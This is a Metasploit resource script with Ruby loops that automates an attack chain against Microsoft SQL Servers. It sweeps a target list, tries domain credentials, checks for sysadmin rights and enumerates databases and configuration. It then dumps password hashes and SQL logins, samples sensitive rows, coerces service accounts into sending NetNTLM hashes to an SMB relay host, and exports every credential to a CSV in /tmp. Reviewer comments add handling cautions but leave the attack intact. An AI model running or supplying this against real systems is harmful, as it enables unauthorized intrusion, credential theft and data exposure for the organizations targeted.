#---------------------------------
# Start logging
#---------------------------------
# NOTE(review): spool captures every line of console output from here on,
# including the hashes, logins and sampled rows printed by later stages.
# /tmp is shared and normally world-readable; prefer an engagement directory
# with restrictive permissions and remove the log when the work is finished.
spool /tmp/msf-sql.log
#---------------------------------
# Setup global vars - UPDATE THIS
#---------------------------------
# setg makes these values the defaults for every module loaded below.
# The password is kept in clear text in this file, so the file needs the
# same protection as the spool log and the creds export at the end.
setg USERNAME User1
setg PASSWORD Password1
setg DOMAIN acme.com
# Authenticate as a Windows/domain account (DOMAIN\USERNAME) rather than a
# SQL login - MSSQL mixin option; confirm with "show options" on any module.
setg USE_WINDOWS_AUTHENT true
# NOTE(review): presumably consumed only by mssql_ntlm_stealer in the last
# stage; nothing else in this script references it.
setg SMBPROXY 10.0.0.230
#---------------------------------
# Identify live SQL Servers - UPDATE THIS
#---------------------------------
# Target list comes from a file:// URI. The <ruby> blocks below rely on the
# hosts/services this scan records in framework.db, so if the scan finds
# nothing every later stage is a no-op.
use auxiliary/scanner/mssql/mssql_ping
set rhosts file:///pentest/sql.txt
set threads 50
exploit
#---------------------------------
# Test access with domain creds
#---------------------------------
# RHOSTS/RPORT are assigned per service by the <ruby> block that follows;
# only VERBOSE and THREADS are fixed here.
use auxiliary/scanner/mssql/mssql_login
set VERBOSE false
set THREADS 50
<ruby>
# For every open "mssql" service recorded in the workspace database, point
# the currently loaded module at that host/port and run it once.
framework.db.hosts.each do |host|
  open_mssql = host.services.select { |svc| svc.name == "mssql" && svc.state == "open" }
  open_mssql.each do |svc|
    run_single("set RHOSTS #{host.address}")
    run_single("set RPORT #{svc.port}")
    run_single("run")
  end
end
</ruby>
#---------------------------------
# Test for sysadmin access
#---------------------------------
use auxiliary/admin/mssql/mssql_sql
set VERBOSE false
# NOTE(review): THREADS is a scanner-module option; whether this admin module
# honours it is not visible here - harmless if ignored.
set THREADS 50
# Single-row query reporting, per server: its name, whether the login holds
# the sysadmin role, the row count of master..sysservers (labelled "links")
# and the IsClustered server property. The single quotes are escaped so the
# console's argument splitter hands them through to the query intact
# (presumably - check the emitted SQL with VERBOSE true if it misparses).
set sql select \'server: \' + @@servername + \',sysadmin: \' + cast(IS_SRVROLEMEMBER(\'sysadmin\') as varchar(10)) + \',links: \' + (select cast((select count(srvname) from master..sysservers) as varchar(10))) + \',clustered: \' + (select cast(SERVERPROPERTY(\'IsClustered\') as varchar(10))) as OUTPUT
<ruby>
# Run the loaded module once against each open "mssql" service in the
# workspace database (admin module: RHOST, singular).
framework.db.hosts.each do |host|
  host.services.each do |svc|
    next unless svc.name == "mssql" && svc.state == "open"

    run_single("set RHOST #{host.address}")
    run_single("set RPORT #{svc.port}")
    run_single("run")
  end
end
</ruby>
#---------------------------------
# List accessible databases
#---------------------------------
use auxiliary/admin/mssql/mssql_sql
set VERBOSE false
# NOTE(review): THREADS is a scanner-module option; see the sysadmin stage.
set THREADS 50
# Names of the databases the authenticated login can open (has_dbaccess = 1).
set sql select name from master..sysdatabases where has_dbaccess(name)=1
<ruby>
# Point the loaded module at every open "mssql" service known to the
# workspace database and run it (RHOST, singular, for this admin module).
framework.db.hosts.each do |host|
  mssql_services = host.services.select { |svc| svc.name == "mssql" && svc.state == "open" }
  mssql_services.each do |svc|
    run_single("set RHOST #{host.address}")
    run_single("set RPORT #{svc.port}")
    run_single("run")
  end
end
</ruby>
#---------------------------------
# Dump accessible config info
#---------------------------------
# Server-configuration enumeration; output goes to the console and hence
# into the spool log opened at the top of this script.
use auxiliary/admin/mssql/mssql_enum
set VERBOSE false
<ruby>
# Run the loaded module against each open "mssql" service in the workspace
# database, one host/port at a time.
framework.db.hosts.each do |host|
  host.services.each do |svc|
    next unless svc.name == "mssql" && svc.state == "open"

    run_single("set RHOST #{host.address}")
    run_single("set RPORT #{svc.port}")
    run_single("run")
  end
end
</ruby>
#---------------------------------
# Dump password hashes if possible
#---------------------------------
# Requires the privilege level checked in the sysadmin stage; hashes are
# presumably stored in the workspace creds table that the final "creds -o"
# export reads, and are also echoed into the spool log.
use auxiliary/scanner/mssql/mssql_hashdump
set VERBOSE false
# Deliberately single-threaded; the reason is not stated in this script.
set THREADS 1
<ruby>
# For each open "mssql" service recorded in the workspace database, set the
# loaded scanner module's target (RHOSTS) and run it.
framework.db.hosts.each do |host|
  candidates = host.services.select { |svc| svc.name == "mssql" && svc.state == "open" }
  candidates.each do |svc|
    run_single("set RHOSTS #{host.address}")
    run_single("set RPORT #{svc.port}")
    run_single("run")
  end
end
</ruby>
#---------------------------------
# Dump all of the SQL logins
#---------------------------------
use auxiliary/admin/mssql/mssql_enum_sql_logins
# NOTE(review): module-specific option; presumably the upper bound on the
# principal ids the module walks - confirm with "show options" before
# changing it, since a larger value means proportionally more queries.
set FuzzNum 500
set VERBOSE false
<ruby>
# Run the loaded admin module once per open "mssql" service in the
# workspace database (RHOST, singular).
framework.db.hosts.each do |host|
  host.services.each do |svc|
    next unless svc.name == "mssql" && svc.state == "open"

    run_single("set RHOST #{host.address}")
    run_single("set RPORT #{svc.port}")
    run_single("run")
  end
end
</ruby>
#---------------------------------
# Dump sample of sensitive data
#---------------------------------
use auxiliary/admin/mssql/mssql_findandsampledata
# Presumably the number of rows returned per matching column - confirm
# with "show options". Keep it small: every sampled row is real data.
set SAMPLE_SIZE 5
# NOTE(review): the only stage run with VERBOSE true, so the sampled rows
# are printed to the console and land in /tmp/msf-sql.log via spool. This
# is the most sensitive output of the whole script; handle the log
# accordingly.
set VERBOSE true
<ruby>
# Target every open "mssql" service in the workspace database with the
# loaded module, setting RHOSTS/RPORT before each run.
framework.db.hosts.each do |host|
  matches = host.services.select { |svc| svc.name == "mssql" && svc.state == "open" }
  matches.each do |svc|
    run_single("set RHOSTS #{host.address}")
    run_single("set RPORT #{svc.port}")
    run_single("run")
  end
end
</ruby>
#----------------------------------------
# Capture service account NetNTLM hashes
#----------------------------------------
# Presumably the consumer of the SMBPROXY global set at the top of this
# script; the listener at that address must already be running, which this
# script does not start.
use auxiliary/admin/mssql/mssql_ntlm_stealer
set VERBOSE false
set THREADS 50
<ruby>
# Run the loaded module against each open "mssql" service recorded in the
# workspace database, one host/port per run.
framework.db.hosts.each do |host|
  host.services.each do |svc|
    next unless svc.name == "mssql" && svc.state == "open"

    run_single("set RHOSTS #{host.address}")
    run_single("set RPORT #{svc.port}")
    run_single("run")
  end
end
</ruby>
#----------------------------------------
# Export list
#----------------------------------------
# Writes every credential in the workspace database (presumably including
# the hashes gathered above) to a CSV. Same caveat as the spool log: /tmp is
# shared, so use a protected location and delete the export after use.
creds -o /tmp/msf-creds.csv